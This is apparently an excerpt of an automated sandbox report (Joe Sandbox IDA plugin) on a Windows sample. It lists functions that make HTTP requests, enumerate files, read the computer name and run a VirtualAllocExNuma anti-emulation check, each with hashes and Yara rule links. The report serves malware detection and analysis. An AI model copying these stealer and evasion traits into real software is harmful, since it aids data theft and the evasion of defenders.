Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: c0cdd25992ae71afd33097c01f067f7bcf7fb21af7d4f09c9682eb1d99adefb5
Instruction ID: f79a136b255eeb3d3272906438a7c816e9434f68782303f47c281b685f32259f
Opcode Fuzzy Hash: c0cdd25992ae71afd33097c01f067f7bcf7fb21af7d4f09c9682eb1d99adefb5
Instruction Fuzzy Hash: E4F01C70940205EFEB10BBA0DC4AB7E7B78AF48701F10491AFA17AA1D9DFF46544CE65

Function 00966B70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00966B7F

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00966C2C

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: da0a94f12ad803e1af0cf51fc102c251d468509cf34955fc2cb811a8d14f2f27
Instruction ID: 81de50d809e5b8f5f9d9fa983ce6476476824ee47d34d8494f5deeb1775d3898
Opcode Fuzzy Hash: da0a94f12ad803e1af0cf51fc102c251d468509cf34955fc2cb811a8d14f2f27
Instruction Fuzzy Hash: 915170B1D002189BDB24EBA0DC95BEEB774AF94304F5045A9E205771C1EF746E88CF55

Function 00964CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 009562D0: InternetOpenA.WININET(00970DE6,00000001,00000000,00000000,00000000), ref: 00956331
Part of subcall function 009562D0: StrCmpCA.SHLWAPI(?,0120F340), ref: 00956353
Part of subcall function 009562D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956385
Part of subcall function 009562D0: HttpOpenRequestA.WININET(00000000,GET,?,0120EE20,00000000,00000000,00400100,00000000), ref: 009563D5
Part of subcall function 009562D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0095640F
Part of subcall function 009562D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00956421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00964D08

Strings

ERROR, xrefs: 00964CFA
ERROR, xrefs: 00964D53

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 21aa565c91da6a83342dff0a74ec4e945858f95e4f83bcd8d8c516054c95f867
Instruction ID: e57bf1165d4225020e1f14754b0c756c4e4d3ba5dd2ce7c33930726481f2dc28
Opcode Fuzzy Hash: 21aa565c91da6a83342dff0a74ec4e945858f95e4f83bcd8d8c516054c95f867
Instruction Fuzzy Hash: 52110330914108A7CB14FF64DC56FED7338AF90300F418554F91A67192EF70AB19CB92

Function 00964A20 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00968880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009688AB

lstrcat.KERNEL32(?,00000000), ref: 00964A5A
lstrcat.KERNEL32(?,00971040), ref: 00964A77
lstrcat.KERNEL32(?,01208A90), ref: 00964A8B
lstrcat.KERNEL32(?,00971044), ref: 00964A9D

Part of subcall function 009643F0: wsprintfA.USER32 ref: 0096440C
Part of subcall function 009643F0: FindFirstFileA.KERNEL32(?,?), ref: 00964423

Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,00970FAC), ref: 00964451
Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,00970FB0), ref: 00964467
Part of subcall function 009643F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0096465D
Part of subcall function 009643F0: FindClose.KERNEL32(000000FF), ref: 00964672

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: e6ae1e598e9b900d5c5c1958e93df5ea930a41eb6d3d1d3cdbdb9768524185f8
Instruction ID: 5286c9082a13484af010e9c3b3caeceeddf4950e0ca12bab902dc067c89593f6
Opcode Fuzzy Hash: e6ae1e598e9b900d5c5c1958e93df5ea930a41eb6d3d1d3cdbdb9768524185f8
Instruction Fuzzy Hash: 9021AA76900208A7C714FBA0DC46FED773CABD5300F40855DBA5E67191EE745AC88BA1

Function 00960580 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01208AE0), ref: 009605DA
StrCmpCA.SHLWAPI(00000000,01208AF0), ref: 009606A6
StrCmpCA.SHLWAPI(00000000,01208A30), ref: 009607DD

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e840da894941d7d4e7218d2cb604bbee2325fc857296f8f1458a2a8002e1ee47
Instruction ID: 03a7eef7b491756355547f56b482881458fb795ee10bc191b44f3067941e1962
Opcode Fuzzy Hash: e840da894941d7d4e7218d2cb604bbee2325fc857296f8f1458a2a8002e1ee47
Instruction Fuzzy Hash: 79915775A002489FCB28EF64D996FED7775FFD5300F008519E8099F255EB309A09CB92

Function 009605A5 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01208AE0), ref: 009605DA
StrCmpCA.SHLWAPI(00000000,01208AF0), ref: 009606A6
StrCmpCA.SHLWAPI(00000000,01208A30), ref: 009607DD

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 492c2bab86df1597d00fb793bf1a71ad48320e3b0cf7f33188d965aedf0d18e9
Instruction ID: b55b51d77945620602c5cff6ea2a19d5ce015a59643ad0ec03bb224fcdf36a25
Opcode Fuzzy Hash: 492c2bab86df1597d00fb793bf1a71ad48320e3b0cf7f33188d965aedf0d18e9
Instruction Fuzzy Hash: ED815175A002089FCB18EF64D995FEEB7B5FFD5300F108529E8099B255DB30AA09CF82

Function 00967380 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009673B0
RtlAllocateHeap.NTDLL(00000000), ref: 009673B7
GetComputerNameA.KERNEL32(?,00000104), ref: 009673CF

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 674fea874400e3413463c874603e0cdb2c88f471d7b5dfb96ab539301c06ca4a
Instruction ID: b23c8fd5d9f96069117a87b334a32d9a2ac743fbaaa10db34e6b60790adf568a
Opcode Fuzzy Hash: 674fea874400e3413463c874603e0cdb2c88f471d7b5dfb96ab539301c06ca4a
Instruction Fuzzy Hash: 19016DB1A04209EBC710CF99DD49BAABBB8FB44765F10061AF909A3680DB745944CBA1

Function 6C673060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C673095

Part of subcall function 6C6735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6FF688,00001000), ref: 6C6735D5
Part of subcall function 6C6735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6735E0
Part of subcall function 6C6735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6735FD
Part of subcall function 6C6735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C67363F
Part of subcall function 6C6735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C67369F
Part of subcall function 6C6735A0: __aulldiv.LIBCMT ref: 6C6736E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C67309F

Part of subcall function 6C695B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6956EE,?,00000001), ref: 6C695B85
Part of subcall function 6C695B50: EnterCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695B90
Part of subcall function 6C695B50: LeaveCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695BD8
Part of subcall function 6C695B50: GetTickCount64.KERNEL32 ref: 6C695BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6730BE

Part of subcall function 6C6730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C673127
Part of subcall function 6C6730F0: __aulldiv.LIBCMT ref: 6C673140

Part of subcall function 6C6AAB2A: __onexit.LIBCMT ref: 6C6AAB30

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 9bf5118b5bc833820fdcb21c7401f766a6372751390e56b8e24ada445aa9b498
Instruction ID: 51df039d868ffe682c9ce56915deeffaff98179365ca50e83b886be4c8fe527a
Opcode Fuzzy Hash: 9bf5118b5bc833820fdcb21c7401f766a6372751390e56b8e24ada445aa9b498
Instruction Fuzzy Hash: A5F04922D2074892CB10DF75A8C11EA73B1AF6B114F001729E86453611FF2061D8C3DF

Function 00968F10 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00968F24
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00968F45
CloseHandle.KERNEL32(00000000), ref: 00968F4F

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 515967c37d8d39810d7c94bf671440acbfb6b896ce1b75bec7ac0a4b9bb88721
Instruction ID: 69130fee5f802b8b100df57282e25b4eebf937fc85407c6cec74384a78467fc9
Opcode Fuzzy Hash: 515967c37d8d39810d7c94bf671440acbfb6b896ce1b75bec7ac0a4b9bb88721
Instruction Fuzzy Hash: F3F0F47590420CFBDB14DFA4DD5AFED7778AB08700F104558FB1957190DAB09E85CB91

Function 00951110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0095112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00951132
ExitProcess.KERNEL32 ref: 00951143

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
